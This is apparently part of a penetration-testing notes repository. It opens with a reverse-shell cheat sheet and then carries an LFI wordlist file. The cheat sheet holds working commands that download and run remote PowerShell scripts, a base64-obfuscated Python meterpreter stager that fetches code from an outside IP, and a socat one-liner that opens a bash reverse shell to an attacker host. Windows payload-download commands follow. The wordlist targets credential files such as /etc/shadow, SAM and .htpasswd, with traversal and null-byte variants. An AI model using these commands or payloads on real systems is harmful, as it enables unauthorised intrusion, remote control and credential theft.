565 | 566 | ![cabesha](https://user-images.githubusercontent.com/7115563/42811084-e286eb5a-89b9-11e8-8ec8-b0b8c3980774.jpg) 567 | 568 | 569 | References: https://www.hacklikeapornstar.com/ 570 | 571 | 572 | 573 |

Reverse Shells

574 | 575 |

Reverse DNS Shell with dnscat powershell

576 | 577 | Server 578 | 579 |

ruby dnscat2.rb -e open --no-cache tunnel.domain.com

580 | 581 | 582 | Client 583 | 584 |

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1'); Start-Dnscat2 -Domain tunnel.domain.com -DNSServer 8.8.4.4

585 | 586 | 587 | ![dns](https://user-images.githubusercontent.com/7115563/35040679-5a155bfa-fb82-11e7-98ec-ba015e3ad69c.png) 588 | 589 | Reference: https://github.com/lukebaggett/dnscat2-powershell 590 | 591 | 592 |

Reverse ICMP shell

593 | 594 | Server 595 | 596 |

 python icmpsh_m.py [IP atacante] [IP victima]

597 | 598 | Client 599 | 600 |

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellIcmp.ps1'); Invoke-PowerShellIcmp -IPAddress [IP atacante]

601 | 602 | ![icmpreverseshell](https://user-images.githubusercontent.com/7115563/35213289-6ac51b00-ff5d-11e7-9b66-766af2aaf92e.png) 603 | 604 | Reference: https://esgeeks.com/icmpsh-shell-reverse-con-icmp/ 605 | 606 | 607 |

Reverse HTTP Shell through Proxy

608 | 609 |

use payload/python/meterpreter/reverse_http

610 | 611 | ![proxy2](https://user-images.githubusercontent.com/7115563/33836652-3d9c9624-de8a-11e7-9869-e18c5a28ebd7.png) 612 | 613 | 614 | ```python -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnUHJveHlIYW5kbGVyJ10pCmhzPVtdCmhzLmFwcGVuZCh1bC5Qcm94eUhhbmRsZXIoeydodHRwJzonaHR0cDovLzE5Mi4xNjguMTA3LjIzMjo4MDgwJ30pKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cDovLzE3OC42Mi41OC4zNTo4MC9qOTkzQScpLnJlYWQoKSkK')))"``` 615 | 616 | Finally we set up the handler: 617 | 618 | ![proxy3](https://user-images.githubusercontent.com/7115563/33836552-fd3204ac-de89-11e7-940c-71c8ab321bf7.png) 619 | 620 | 621 |

Miscellaneous

622 | 623 |

Interactive Reverse Shell

624 | 625 | Method 1 626 | 627 | Attacker: 628 | 629 | ```socat file:`tty`,raw,echo=0 TCP-L:4444``` 630 | 631 | Victim: 632 | 633 | ```wget -q http://10.10.14.16/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.16:4444``` 634 | 635 | Socat Binary: https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat 636 | 637 | Method 2 638 | 639 | In reverse shell 640 | 641 |

642 | python -c 'import pty; pty.spawn("/bin/bash")'
643 | Ctrl-Z
644 |

645 | 646 | In kali 647 | 648 |

649 | echo $TERM
650 | stty -a
651 | stty raw -echo
652 | fg
653 |

654 | 655 | In reverse shell 656 | 657 |

658 | reset
659 | export SHELL=bash
660 | export TERM=xterm-256color
661 | stty rows  columns 
662 | bash
663 |

664 | 665 |

Windows File Transfer

666 | 667 | bitsadmin 668 | 669 | `bitsadmin /transfer debjob /download /priority normal http:///shell.php c:\xampp\htdocs\shell.php` 670 | 671 | cscript wget.vbs (code on the repo) 672 | 673 | `cscript wget.vbs http:///test.txt test.txt` 674 | 675 | powershell 676 | 677 | `powershell -c "(new-object System.Net.WebClient).Downloadfile('http:///exploit.exe', 'C:\Windows\temp\exploit.txt')"` 678 | 679 | ftp 680 | 681 | client: 682 | 683 |

684 | echo open [ip] [port] > ftpscript.txt
685 | echo anonymous>> ftpscript.txt
686 | echo PASS >> ftpscript.txt
687 | echo bin >> ftpscript.txt
688 | echo get meter.exe>> ftpscript.txt
689 | echo quit >> ftpscript.txt
690 | ftp -s:ftpscript.txt
691 |

692 | 693 | server: 694 | 695 | python -m pyftpdlib --port=2121 --write 696 | 697 | wget.exe 698 | 699 | Upload to vulnerable server from kali: ` /usr/share/windows-binaries/wget.exe` 700 | 701 | `wget.exe http:///file file` 702 | 703 | certutil 704 | 705 | `certutil -urlcache -split -f https:///file.txt file.txt` 706 | 707 |

Bypass VPN routing restrictions

708 | 709 |

openconnect vpnXXX02.XXXX.com -u XX -s ‘vpn-slice XXX.46.0.0/16 hostname3 mantis=XXX.41.2XX.68’

710 | 711 | ![vpn1](https://user-images.githubusercontent.com/7115563/41146909-30e484de-6b05-11e8-82fb-acfc17a722a2.png) 712 | 713 | Reference: https://github.com/dlenski/vpn-slice 714 | 715 | 716 | 717 | -------------------------------------------------------------------------------- /lfiunix.txt: -------------------------------------------------------------------------------- 1 | .ssh/auhtorized_keys 2 | /.ssh/authorized_keys 3 | /var/mail/www-data 4 | /var/log/www-data 5 | \apache2\log\access_log 6 | \apache2\log\access.log 7 | \apache2\log\error_log 8 | \apache2\log\error.log 9 | /apache2/logs/access.log 10 | \apache2\logs\access_log 11 | \apache2\logs\access.log 12 | /apache2/logs/access.log%00 13 | /apache2/logs/error.log 14 | \apache2\logs\error_log 15 | \apache2\logs\error.log 16 | /apache2/logs/error.log%00 17 | /apache/conf/httpd.conf 18 | \apache\log\access_log 19 | \apache\log\access.log 20 | \apache\log\error_log 21 | \apache\log\error.log 22 | /apache/logs/access.log 23 | /apache/logs/access.log 24 | \apache\logs\access_log 25 | \apache\logs\access.log 26 | /apache/logs/access.log%00 27 | /apache/logs/error.log 28 | /apache/logs/error.log 29 | \apache\logs\error_log 30 | \apache\logs\error.log 31 | /apache/logs/error.log%00 32 | /apache/php/php.ini 33 | /apache\php\php.ini 34 | /apache\php\php.ini%00 35 | /app/etc/local.xml 36 | /.aptitude/config 37 | .aptitude/config 38 | /.bash_config 39 | .bash_config 40 | /.bash_history 41 | .bash_history 42 | /.bash_logout 43 | .bash_logout 44 | /.bashrc 45 | .bashrc 46 | /bin/php.ini 47 | /bin/php.ini%00 48 | /boot/grub/grub.cfg 49 | /boot/grub/menu.lst 50 | /boot.ini 51 | /.cache/notify-osd.log 52 | .cache/notify-osd.log 53 | c:\apache\php\php.ini 54 | C:\apache\php\php.ini 55 | C:\boot.ini 56 | c:\home2\bin\stable\apache\php.ini 57 | C:\home2\bin\stable\apache\php.ini 58 | c:\home\bin\stable\apache\php.ini 59 | C:\home\bin\stable\apache\php.ini 60 | C:\MySQL\data\hostname.err 61 | C:\MySQL\data\mysql-bin.log 62 | C:\MySQL\data\mysql.err 63 | C:\MySQL\data\mysql.log 64 | C:\MySQL\my.cnf 65 | C:\MySQL\my.ini 66 | c:\NetServer\bin\stable\apache\php.ini 67 | /config/app.php 68 | /config/custom.php 69 | /config/database.php 70 | /config_dev.yml 71 | /config.inc.php 72 | /.config/odesk/odesk 73 | .config/oDesk/oDesk Team.conf 74 | /config.php 75 | /config_prod.yml 76 | /config_test.yml 77 | /configuration.php 78 | /config.yml 79 | c:\php4\php.ini 80 | C:\php4\php.ini 81 | C:\php4\sessions\ 82 | c:\php5\php.ini 83 | C:\php5\php.ini 84 | C:\php5\sessions\ 85 | c:\php\php.ini 86 | c:\PHP\php.ini 87 | C:\php\php.ini 88 | C:\php\sessions\ 89 | C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf 90 | C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf 91 | C:\ProgramFiles\ApacheGroup\Apache\logs\access.log 92 | C:\ProgramFiles\ApacheGroup\Apache\logs\error.log 93 | C:\ProgramFiles\MySQL\data\hostname.err 94 | C:\ProgramFiles\MySQL\data\mysql-bin.log 95 | C:\ProgramFiles\MySQL\data\mysql.err 96 | C:\ProgramFiles\MySQL\data\mysql.log 97 | C:\ProgramFiles\MySQL\my.cnf 98 | C:\ProgramFiles\MySQL\my.ini 99 | C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err 100 | C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log 101 | C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err 102 | C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log 103 | C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf 104 | C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini 105 | C:\ProgramFiles\xampp\apache\conf\httpd.conf 106 | /.cshrc 107 | .cshrc 108 | c:\WINDOWS\php.ini 109 | C:\WINDOWS\php.ini 110 | C:\WINDOWS\Repair\SAM 111 | C:\WINDOWS\TEMP\ 112 | C:\WINDOWS\win.ini 113 | c:\WINNT\php.ini 114 | C:\WINNT\php.ini 115 | C:\WINNT\win.ini 116 | c:\xampp\apache\bin\php.ini 117 | C:\xampp\apache\bin\php.ini 118 | etc%2fpasswd 119 | etc%2fpasswd%00 120 | etc%5cpasswd 121 | etc%5cpasswd%00 122 | /etc/adduser.conf 123 | /etc/alias 124 | /etc/apache22/conf/httpd.conf 125 | /etc/apache22/httpd.conf 126 | /etc/apache2/apache2.conf 127 | /etc/apache2/apache.conf 128 | /etc/apache2.conf 129 | /etc/apache2/conf.d/charset 130 | /etc/apache2/conf.d/phpmyadmin.conf 131 | /etc/apache2/conf.d/security 132 | /etc/apache2/conf/httpd.conf 133 | /etc/apache2/conf/httpd.conf%00 134 | /etc/apache2/default-server.conf 135 | /etc/apache2/envvars 136 | /etc/apache2/.htpasswd 137 | /etc/apache2/httpd2.conf 138 | /etc/apache2/httpd.conf 139 | /etc/apache2/httpd.conf%00 140 | /etc/apache2/mods-available/autoindex.conf 141 | /etc/apache2/mods-available/deflate.conf 142 | /etc/apache2/mods-available/dir.conf 143 | /etc/apache2/mods-available/mem_cache.conf 144 | /etc/apache2/mods-available/mime.conf 145 | /etc/apache2/mods-available/proxy.conf 146 | /etc/apache2/mods-available/setenvif.conf 147 | /etc/apache2/mods-available/ssl.conf 148 | /etc/apache2/mods-enabled/alias.conf 149 | /etc/apache2/mods-enabled/deflate.conf 150 | /etc/apache2/mods-enabled/dir.conf 151 | /etc/apache2/mods-enabled/mime.conf 152 | /etc/apache2/mods-enabled/negotiation.conf 153 | /etc/apache2/mods-enabled/php5.conf 154 | /etc/apache2/mods-enabled/status.conf 155 | /etc/apache2/ports.conf 156 | /etc/apache2/sites-available/default 157 | /etc/apache2/sites-available/default-ssl 158 | /etc/apache2/sites-available/default-ssl.conf 159 | /etc/apache2/sites-enabled/000-default 160 | /etc/apache2/sites-enabled/000-default.conf 161 | /etc/apache2/sites-enabled/default 162 | /etc/apache2/ssl-global.conf 163 | /etc/apache2/vhosts.d/00_default_vhost.conf 164 | /etc/apache2/vhosts.d/default_vhost.include 165 | /etc/apache/access.conf 166 | /etc/apache/apache.conf 167 | /etc/apache/conf/httpd.conf 168 | /etc/apache/conf/httpd.conf%00 169 | /etc/apache/default-server.conf 170 | /etc/apache/.htpasswd 171 | /etc/apache/httpd.conf 172 | /etc/apt/apt.conf 173 | /etc/avahi/avahi-daemon.conf 174 | /etc/bash.bashrc 175 | /etc/bash_completion.d/debconf 176 | /etc/bluetooth/input.conf 177 | /etc/bluetooth/main.conf 178 | /etc/bluetooth/network.conf 179 | /etc/bluetooth/rfcomm.conf 180 | etc%c0%afpasswd 181 | etc%c0%afpasswd%00 182 | /etc/ca-certificates.conf 183 | /etc/ca-certificates.conf.dpkg-old 184 | /etc/casper.conf 185 | /etc/chkrootkit.conf 186 | /etc/chrootusers 187 | /etc/chrootUsers 188 | /etc/chrootUsers%00 189 | /etc/clamav/clamd.conf 190 | /etc/clamav/freshclam.conf 191 | /etc/crontab 192 | /etc/crypttab 193 | /etc/cups/acroread.conf 194 | /etc/cups/cupsd.conf 195 | /etc/cups/cupsd.conf.default 196 | /etc/cups/pdftops.conf 197 | /etc/cups/printers.conf 198 | /etc/cvs-cron.conf 199 | /etc/cvs-pserver.conf 200 | /etc/debconf.conf 201 | /etc/debian_version 202 | /etc/default/grub 203 | /etc/deluser.conf 204 | /etc/dhcp3/dhclient.conf 205 | /etc/dhcp3/dhcpd.conf 206 | /etc/dhcp/dhclient.conf 207 | /etc/dns2tcpd.conf 208 | /etc/e2fsck.conf 209 | /etc/esound/esd.conf 210 | /etc/etter.conf 211 | /etc/exports 212 | /etc/fedora-release 213 | /etc/firewall.rules 214 | /etc/foremost.conf 215 | /etc/fstab 216 | /etc/ftpchroot 217 | /etc/ftpchroot%00 218 | /etc/ftphosts 219 | /etc/ftphosts%00 220 | /etc/ftpusers 221 | /etc/fuse.conf 222 | /etc/group 223 | /etc/group- 224 | /etc/group%00 225 | /etc/hdparm.conf 226 | /etc/host.conf 227 | /etc/hostname 228 | /etc/hosts 229 | /etc/hosts.allow 230 | /etc/hosts.deny 231 | /etc/http/conf/httpd.conf 232 | /etc/http/conf/httpd.conf%00 233 | /etc/httpd/apache2.conf 234 | /etc/httpd/apache.conf 235 | /etc/httpd/conf 236 | /etc/httpd.conf 237 | /etc/httpd.conf%00 238 | /etc/httpd/conf/apache2.conf 239 | /etc/httpd/conf/apache.conf 240 | /etc/httpd/conf.d 241 | /etc/httpd/conf.d/php.conf 242 | /etc/httpd/conf.d/squirrelmail.conf 243 | /etc/httpd/conf/httpd.conf 244 | /etc/httpd/conf/httpd.conf%00 245 | /etc/httpd/extra/httpd-ssl.conf 246 | /etc/httpd/httpd.conf 247 | /etc/httpd/httpd.conf%00 248 | /etc/httpd/logs/acces_log 249 | /etc/httpd/logs/acces_log 250 | /etc/httpd/logs/acces.log 251 | /etc/httpd/logs/acces.log 252 | /etc/httpd/logs/acces_log%00 253 | /etc/httpd/logs/acces.log%00 254 | /etc/httpd/logs/access_log 255 | /etc/httpd/logs/access.log 256 | /etc/httpd/logs/error_log 257 | /etc/httpd/logs/error_log 258 | /etc/httpd/logs/error.log 259 | /etc/httpd/logs/error.log 260 | /etc/httpd/logs/error_log%00 261 | /etc/httpd/logs/error.log%00 262 | /etc/httpd/mod_php.conf 263 | /etc/httpd/php.ini 264 | /etc/httpd/php.ini%00 265 | /etc/http/httpd.conf 266 | /etc/http/httpd.conf%00 267 | /etc/inetd.conf 268 | /etc/init.d 269 | /etc/inittab 270 | /etc/ipfw.conf 271 | /etc/ipfw.rules 272 | /etc/issue 273 | /etc/issue.net 274 | /etc/kbd/config 275 | /etc/kernel-img.conf 276 | /etc/kernel-pkg.conf 277 | /etc/ldap/ldap.conf 278 | /etc/ld.so.conf 279 | /etc/lighttpd/lighthttpd.conf 280 | /etc/login.defs 281 | /etc/logrotate.conf 282 | /etc/logrotate.d/ftp 283 | /etc/logrotate.d/ftp%00 284 | /etc/logrotate.d/proftpd 285 | /etc/logrotate.d/proftpd%00 286 | /etc/logrotate.d/vsftpd.log 287 | /etc/logrotate.d/vsftpd.log%00 288 | /etc/ltrace.conf 289 | /etc/mail/sendmail.conf 290 | /etc/mandrake-release 291 | /etc/manpath.config 292 | /etc/master.passwd 293 | /etc/miredo.conf 294 | /etc/miredo/miredo.conf 295 | /etc/miredo/miredo-server.conf 296 | /etc/miredo-server.conf 297 | /etc/modprobe.d/vmware-tools.conf 298 | /etc/modules 299 | /etc/mono/1.0/machine.config 300 | /etc/mono/2.0/machine.config 301 | /etc/mono/2.0/web.config 302 | /etc/mono/config 303 | /etc/motd 304 | /etc/mtab 305 | /etc/mtools.conf 306 | /etc/muddleftpd.com 307 | /etc/muddleftpd/muddleftpd.conf 308 | /etc/muddleftpd/muddleftpd.passwd 309 | /etc/muddleftpd/mudlog 310 | /etc/muddleftpd/mudlogd.conf 311 | /etc/muddleftpd/passwd 312 | /etc/my.cnf 313 | /etc/my.cnf%00 314 | /etc/mysql/conf.d/old_passwords.cnf 315 | /etc/mysql/my.cnf 316 | /etc/mysql/my.cnf%00 317 | /etc/networks 318 | /etc/newsyslog.conf 319 | /etc/nginx.conf 320 | /etc/nginx/nginx.conf 321 | /etc/nginx/sites-available/default 322 | /etc/nginx/sites-enabled/default 323 | /etc/openldap/ldap.conf 324 | /etc/os-release 325 | /etc/osxhttpd/osxhttpd.conf 326 | /etc/pam.conf 327 | /etc/pam.d/proftpd 328 | /..\..\\..\..\\..\..\\..\..\\\/etc/passwd 329 | /etc/passwd 330 | /etc/passwd~ 331 | /etc/passwd- 332 | /etc/passwd%00 333 | etc/passwd%00 334 | /etc/password.master 335 | /etc/php4.4/fcgi/php.ini 336 | /etc/php4.4/fcgi/php.ini%00 337 | /etc/php4/apache2/php.ini 338 | /etc/php4/apache2/php.ini%00 339 | /etc/php4/apache/php.ini 340 | /etc/php4/apache/php.ini%00 341 | /etc/php4/cgi/php.ini 342 | /etc/php4/cgi/php.ini%00 343 | /etc/php5/apache2/php.ini 344 | /etc/php5/apache2/php.ini%00 345 | /etc/php5/apache/php.ini 346 | /etc/php5/apache/php.ini%00 347 | /etc/php5/cgi/php.ini 348 | /etc/php5/cgi/php.ini%00 349 | /etc/php/apache2/php.ini 350 | /etc/php/apache2/php.ini%00 351 | /etc/php/apache/php.ini 352 | /etc/php/apache/php.ini%00 353 | /etc/php/cgi/php.ini 354 | /etc/php/cgi/php.ini%00 355 | /etc/php.ini 356 | /etc/php.ini%00 357 | /etc/phpmyadmin/config.inc.php 358 | /etc/php/php4/php.ini 359 | /etc/php/php4/php.ini%00 360 | /etc/php/php.ini 361 | /etc/php/php.ini%00 362 | /etc/postgresql/pg_hba.conf 363 | /etc/postgresql/postgresql.conf 364 | /etc/profile 365 | /etc/proftp.conf 366 | /etc/proftp.conf%00 367 | /etc/proftpd/modules.conf 368 | /etc/proftpd/modules.conf%00 369 | /etc/protpd/proftpd.conf 370 | /etc/protpd/proftpd.conf%00 371 | /etc/pulse/client.conf 372 | /etc/pure-ftpd.conf 373 | /etc/pure-ftpd.conf%00 374 | /etc/pureftpd.passwd 375 | /etc/pureftpd.passwd%00 376 | /etc/pureftpd.pdb 377 | /etc/pureftpd.pdb%00 378 | /etc/pure-ftpd/pure-ftpd.conf 379 | /etc/pure-ftpd/pure-ftpd.conf%00 380 | /etc/pure-ftpd/pure-ftpd.pdb 381 | /etc/pure-ftpd/pureftpd.pdb 382 | /etc/pure-ftpd/pure-ftpd.pdb%00 383 | /etc/pure-ftpd/pureftpd.pdb%00 384 | /etc/rc.conf 385 | /etc/rc.d/rc.httpd 386 | /etc/redhat-release 387 | /etc/release 388 | /etc/resolv.conf 389 | /etc/resolvconf/update-libc.d/sendmail 390 | /etc/samba/dhcp.conf 391 | /etc/samba/netlogon 392 | /etc/samba/private/smbpasswd 393 | /etc/samba/samba.conf 394 | /etc/samba/smb.conf 395 | /etc/samba/smb.conf.user 396 | /etc/samba/smbpasswd 397 | /etc/samba/smbusers 398 | /etc/security/access.conf 399 | /etc/security/environ 400 | /etc/security/environ%00 401 | /etc/security/failedlogin 402 | /etc/security/group 403 | /etc/security/group%00 404 | /etc/security/group.conf 405 | /etc/security/lastlog 406 | /etc/security/limits 407 | /etc/security/limits%00 408 | /etc/security/limits.conf 409 | /etc/security/namespace.conf 410 | /etc/security/opasswd 411 | /etc/security/pam_env.conf 412 | /etc/security/passwd 413 | /etc/security/passwd%00 414 | /etc/security/sepermit.conf 415 | /etc/security/time.conf 416 | /etc/security/user 417 | /etc/security/user%00 418 | /etc/sensors3.conf 419 | /etc/sensors.conf 420 | /etc/shadow 421 | /etc/shadow~ 422 | /etc/shadow- 423 | /etc/shadow%00 424 | /etc/slackware-release 425 | /etc/smb.conf 426 | /etc/smbpasswd 427 | /etc/smi.conf 428 | /etc/squirrelmail/apache.conf 429 | /etc/squirrelmail/config/config.php 430 | /etc/squirrelmail/config_default.php 431 | /etc/squirrelmail/config_local.php 432 | /etc/squirrelmail/config.php 433 | /etc/squirrelmail/default_pref 434 | /etc/squirrelmail/filters_setup.php 435 | /etc/squirrelmail/index.php 436 | /etc/squirrelmail/sqspell_config.php 437 | /etc/ssh/sshd_config 438 | /etc/sso/sso_config.ini 439 | /etc/stunnel/stunnel.conf 440 | /etc/subversion/config 441 | /etc/sudoers 442 | /etc/suse-release 443 | /etc/sw-cp-server/applications.d/00-sso-cpserver.conf 444 | /etc/sw-cp-server/applications.d/plesk.conf 445 | /etc/sysconfig/network-scripts/ifcfg-eth0 446 | /etc/sysctl.conf 447 | /etc/sysctl.d/10-console-messages.conf 448 | /etc/sysctl.d/10-network-security.conf 449 | /etc/sysctl.d/10-process-security.conf 450 | /etc/sysctl.d/wine.sysctl.conf 451 | /etc/syslog.conf 452 | /etc/timezone 453 | /etc/tinyproxy/tinyproxy.conf 454 | /etc/tomcat6/tomcat-users.xml 455 | /etc/tomcat7/tomcat-users.xml 456 | /etc/tomcat8/tomcat-users.xml 457 | /etc/tor/tor-tsocks.conf 458 | /etc/tsocks.conf 459 | /etc/updatedb.conf 460 | /etc/updatedb.conf.beforevmwaretoolsinstall 461 | /etc/utmp 462 | /etc/vhcs2/proftpd/proftpd.conf 463 | /etc/vhcs2/proftpd/proftpd.conf%00 464 | /etc/vmware-tools/config 465 | /etc/vmware-tools/tpvmlp.conf 466 | /etc/vmware-tools/vmware-tools-libraries.conf 467 | /etc/vsftpd.chroot_list 468 | /etc/vsftpd.chroot_list%00 469 | /etc/vsftpd.conf 470 | /etc/vsftpd.conf%00 471 | /etc/vsftpd/vsftpd.conf 472 | /etc/vsftpd/vsftpd.conf%00 473 | /etc/webmin/miniserv.conf 474 | /etc/webmin/miniserv.users 475 | /etc/wicd/dhclient.conf.template.default 476 | /etc/wicd/manager-settings.conf 477 | /etc/wicd/wired-settings.conf 478 | /etc/wicd/wireless-settings.conf 479 | /etc/wu-ftpd/ftpaccess 480 | /etc/wu-ftpd/ftpaccess%00 481 | /etc/wu-ftpd/ftphosts 482 | /etc/wu-ftpd/ftphosts%00 483 | /etc/wu-ftpd/ftpusers 484 | /etc/wu-ftpd/ftpusers%00 485 | /etc/x11/xorg.conf 486 | /etc/x11/xorg.conf.beforevmwaretoolsinstall 487 | /etc/x11/xorg.conf.orig 488 | /etc/x11/xorg.conf-vesa 489 | /etc/x11/xorg.conf-vmware 490 | /.gitconfig 491 | .gitconfig 492 | .history 493 | /home2/bin/stable/apache/php.ini 494 | /home2\bin\stable\apache\php.ini 495 | /home2\bin\stable\apache\php.ini%00 496 | /home/bin/stable/apache/php.ini 497 | /home\bin\stable\apache\php.ini 498 | /home\bin\stable\apache\php.ini%00 499 | /home/postgres/data/pg_hba.conf 500 | /home/postgres/data/pg_ident.conf 501 | /home/postgres/data/pg_version 502 | /home/postgres/data/postgresql.conf 503 | /home/user/lighttpd/lighttpd.conf 504 | /.hplip/hplip.conf 505 | .hplip/hplip.conf 506 | /http/httpd.conf 507 | /inc/config.php 508 | /includes/config.php 509 | /includes/configure.php 510 | /[jboss]/server/default/conf/jboss-minimal.xml 511 | /[jboss]/server/default/conf/jboss-service.xml 512 | /[jboss]/server/default/conf/jndi.properties 513 | /[jboss]/server/default/conf/log4j.xml 514 | /[jboss]/server/default/conf/login-config.xml 515 | /[jboss]/server/default/conf/server.log.properties 516 | /[jboss]/server/default/conf/standardjaws.xml 517 | /[jboss]/server/default/conf/standardjboss.xml 518 | /[jboss]/server/default/deploy/jboss-logging.xml 519 | /[jboss]/server/default/log/boot.log 520 | /[jboss]/server/default/log/server.log 521 | /.ksh_history 522 | .ksh_history 523 | /library/webserver/documents/default.htm 524 | /library/webserver/documents/default.html 525 | /library/webserver/documents/default.php 526 | /library/webserver/documents/.htaccess 527 | /library/webserver/documents/index.htm 528 | /library/webserver/documents/index.html 529 | /library/webserver/documents/index.php 530 | /LocalSettings.php 531 | \log\access_log 532 | \log\access.log 533 | \log\error_log 534 | \log\error.log 535 | \log\httpd\access_log 536 | \log\httpd\error_log 537 | /logs/access_log 538 | /logs/access.log 539 | \logs\access_log 540 | \logs\access.log 541 | /logs/access.log%00 542 | /logs/error_log 543 | /logs/error.log 544 | \logs\error_log 545 | \logs\error.log 546 | /logs/error.log%00 547 | \logs\httpd\access_log 548 | \logs\httpd\error_log 549 | /logs/pure-ftpd.log 550 | /logs/pure-ftpd.log%00 551 | /logs/security_debug_log 552 | /logs/security_log 553 | /.my.cnf 554 | .my.cnf 555 | /mysql/bin/my.ini 556 | \mysql\bin\my.ini 557 | /mysql/data/{host}.err 558 | /mysql/data/mysql-bin.index 559 | /mysql/data/mysql-bin.log 560 | /mysql/data/mysql.err 561 | /mysql/data/mysql.log 562 | /.mysql_history 563 | .mysql_history 564 | /mysql/my.cnf 565 | /mysql/my.ini 566 | .mysql_secret 567 | /.nano_history 568 | .nano_history 569 | /netserver/bin/stable/apache/php.ini 570 | /NetServer\bin\stable\apache\php.ini 571 | /NetServer\bin\stable\apache\php.ini%00 572 | /opt/apache22/conf/httpd.conf 573 | /opt/apache2/apache2.conf 574 | /opt/apache2/apache.conf 575 | /opt/apache2/conf/apache2.conf 576 | /opt/apache2/conf/apache.conf 577 | /opt/apache2/conf/httpd.conf 578 | /opt/apache2/conf/httpd.conf%00 579 | /opt/apache/apache2.conf 580 | /opt/apache/apache.conf 581 | /opt/apache/conf/apache2.conf 582 | /opt/apache/conf/apache.conf 583 | /opt/apache/conf/httpd.conf 584 | /opt/apache/conf/httpd.conf%00 585 | /opt/httpd/apache2.conf 586 | /opt/httpd/apache.conf 587 | /opt/httpd/conf/apache2.conf 588 | /opt/httpd/conf/apache.conf 589 | /opt/[jboss]/server/default/conf/jboss-minimal.xml 590 | /opt/[jboss]/server/default/conf/jboss-service.xml 591 | /opt/[jboss]/server/default/conf/jndi.properties 592 | /opt/[jboss]/server/default/conf/log4j.xml 593 | /opt/[jboss]/server/default/conf/login-config.xml 594 | /opt/[jboss]/server/default/conf/server.log.properties 595 | /opt/[jboss]/server/default/conf/standardjaws.xml 596 | /opt/[jboss]/server/default/conf/standardjboss.xml 597 | /opt/[jboss]/server/default/deploy/jboss-logging.xml 598 | /opt/[jboss]/server/default/log/boot.log 599 | /opt/[jboss]/server/default/log/server.log 600 | /opt/lampp/etc/httpd.conf 601 | /opt/lampp/logs/access_log 602 | /opt/lampp/logs/access.log 603 | /opt/lampp/logs/access_log%00 604 | /opt/lampp/logs/access.log%00 605 | /opt/lampp/logs/error_log 606 | /opt/lampp/logs/error.log 607 | /opt/lampp/logs/error_log%00 608 | /opt/lampp/logs/error.log%00 609 | /opt/lsws/conf/httpd_conf.xml 610 | /opt/lsws/logs/access.log 611 | /opt/lsws/logs/error.log 612 | /opt/tomcat/logs/catalina.err 613 | /opt/tomcat/logs/catalina.out 614 | /opt/xampp/etc/php.ini 615 | /opt/xampp/etc/php.ini%00 616 | /opt/xampp/logs/access_log 617 | /opt/xampp/logs/access.log 618 | \opt\xampp\logs\access_log 619 | \opt\xampp\logs\access.log 620 | /opt/xampp/logs/access_log%00 621 | /opt/xampp/logs/access.log%00 622 | /opt/xampp/logs/error_log 623 | /opt/xampp/logs/error.log 624 | \opt\xampp\logs\error_log 625 | \opt\xampp\logs\error.log 626 | /opt/xampp/logs/error_log%00 627 | /opt/xampp/logs/error.log%00 628 | /parameters.yml 629 | /php4/php.ini 630 | /php4\php.ini 631 | /php4\php.ini%00 632 | /php5/php.ini 633 | /php5\php.ini 634 | /php5\php.ini%00 635 | php://input 636 | /php/php.ini 637 | /php\php.ini 638 | /PHP\php.ini 639 | /php\php.ini%00 640 | /PHP\php.ini%00 641 | /postgresql/log/pgadmin.log 642 | /private/etc/httpd/apache2.conf 643 | /private/etc/httpd/apache.conf 644 | /private/etc/httpd/httpd.conf 645 | /private/etc/httpd/httpd.conf%00 646 | /private/etc/httpd/httpd.conf.default 647 | /private/etc/httpd/httpd.conf.default%00 648 | /private/etc/squirrelmail/config/config.php 649 | /private/tmp/[jboss]/server/default/conf/jboss-minimal.xml 650 | /private/tmp/[jboss]/server/default/conf/jboss-service.xml 651 | /private/tmp/[jboss]/server/default/conf/jndi.properties 652 | /private/tmp/[jboss]/server/default/conf/log4j.xml 653 | /private/tmp/[jboss]/server/default/conf/login-config.xml 654 | /private/tmp/[jboss]/server/default/conf/server.log.properties 655 | /private/tmp/[jboss]/server/default/conf/standardjaws.xml 656 | /private/tmp/[jboss]/server/default/conf/standardjboss.xml 657 | /private/tmp/[jboss]/server/default/deploy/jboss-logging.xml 658 | /private/tmp/[jboss]/server/default/log/boot.log 659 | /private/tmp/[jboss]/server/default/log/server.log 660 | /proc/cmdline 661 | /proc/cpuinfo 662 | /proc/devices 663 | /proc/meminfo 664 | /proc/net/tcp 665 | /proc/net/udp 666 | /proc/self/cmdline 667 | /proc/self/environ 668 | proc/self/environ 669 | /proc/self/fd/0 670 | /proc/self/fd/1 671 | /proc/self/fd/10 672 | /proc/self/fd/11 673 | /proc/self/fd/12 674 | /proc/self/fd/13 675 | /proc/self/fd/14 676 | /proc/self/fd/15 677 | /proc/self/fd/16 678 | /proc/self/fd/17 679 | /proc/self/fd/18 680 | /proc/self/fd/19 681 | /proc/self/fd/2 682 | /proc/self/fd/20 683 | /proc/self/fd/21 684 | /proc/self/fd/22 685 | /proc/self/fd/23 686 | /proc/self/fd/24 687 | /proc/self/fd/25 688 | /proc/self/fd/255 689 | 